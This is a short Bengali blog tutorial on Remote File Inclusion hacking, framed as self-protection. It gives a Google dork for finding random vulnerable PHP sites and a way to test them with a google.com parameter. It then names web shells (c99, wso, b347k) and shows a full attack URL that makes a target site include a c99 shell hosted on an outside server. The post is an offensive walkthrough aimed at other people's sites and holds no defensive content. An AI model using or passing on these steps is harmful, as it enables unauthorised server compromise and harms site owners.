RFI Hacking Tutorial - Hack School Bangladesh

হ্যাকিং শিখুন নিজেকে রক্ষা করার জন্যে!

শুক্রবার, ৬ জুন, ২০১৪

RFI Hacking Tutorial


Remote File Inclusion হলো বর্তমান সময়ের জনপ্রিয় হ্যাকিং পদ্ধতি গুলোর মধ্যে একটি।
যা ওয়েব এপ্লিকেশনে পাওয়া যায়।
এই ধরনের দুর্বলতাকে ব্যাবহার করে হ্যাকার দুর্বল সাইটটির সার্ভারে ফাইল এড/যোগ করতে পারে।
যদি হ্যাকার সফল ভাবে এই কাজটি করতে সক্ষম হয় তাহলে সে সেই দুর্বল সাইটটি কে হ্যাক করতে পারবে।
এবং তার সাথে সাথে সার্ভারটি ও হ্যাক করা সম্ভব।
সাধারনত এই টাইপের দুর্বলতা গুলো এই ধরনের সাইটে থাকে যেই সাইট গুলোর লিঙ্ক গুলো এরকম হয়।
উদাহারণঃ http://www.Targetsite.com/index.php?page=index.php
এই দুর্বলতাটি তে দুর্বল সাইট বের করার জন্যে সবচেয়ে বেশী কার্যকর google dork হচ্ছে
“inurl:index.php?page=”
এই Dork টি index.php?page ইউআরএলের যত সাইট আছে সব গুলো আপনাকে রেসাল্টে দেখাবে।
যেকোনো একটি সাইটে প্রবেশ করুন এবং সাইটটি দুর্বল নাকি চেক করার জন্যে
?page= এর পর www.google.com এড করে এন্টার চাপুন।
উদাহারণঃ www.targetsite.com/index.php?page=www.google.com

যদি মনে করেন ওয়েবসাইট টি হয় http://example.com/v2/index.php?page=index.php
তাহলে কোড দেওয়ার পর লিঙ্কটি হবে এরকমঃ
http://www.example.com/v2/index.php?page=http://google.com/
যদি সাইটটি এখন গুগলে রিডাইরেক্ট করে।
মানে যদি আপনি এই লিঙ্কে যাওয়ার পর দেখতে পান যে গুগল দেখা যাচ্ছে তাহলে সাইট টি দুর্বল।
যদি না আসে।। তাহলে আরেকটি সাইট খুজে বের করেন!
এরপরে।। এখন কাজ হলো হ্যাকিং শেল আপলোড দেওয়া।
শেল ডাউনলোড করার জন্যে গুগল করতে পারেন।
(madspot shell download)(wso shell download)
(b347k shell download)
Etc...
যায় হোক LFI এর জন্যে আমাদের শেল ডাউনলোড করা লাগবে না।
শেল আপলোড করা আছে এমন কোনো হোস্টিং থাকলেয় চলবে
সেটার জন্যে গুগলে সার্চ করুন।
c99 shell.txt
http://www.c99txt.net/s/c99.txt (শেল লিঙ্ক)
এখন শেল আপলোড করার জন্যে লিঙ্কটি হবে।
http://www.vuln.rfisite.com/v2/index.php?page=http://www.c99txt.net/s/c99.txt

ধন্যবাদ আশা করি সবাই বুঝতে পেরেছেন।
সাইবার ওয়ার্ম।
Hack For Learn

কোন মন্তব্য নেই:

একটি মন্তব্য পোস্ট করুন

মনে রাখবেন: এই ব্লগের কোনও সদস্যই কোনও মন্তব্য পোস্ট করতে পারে৷

Pages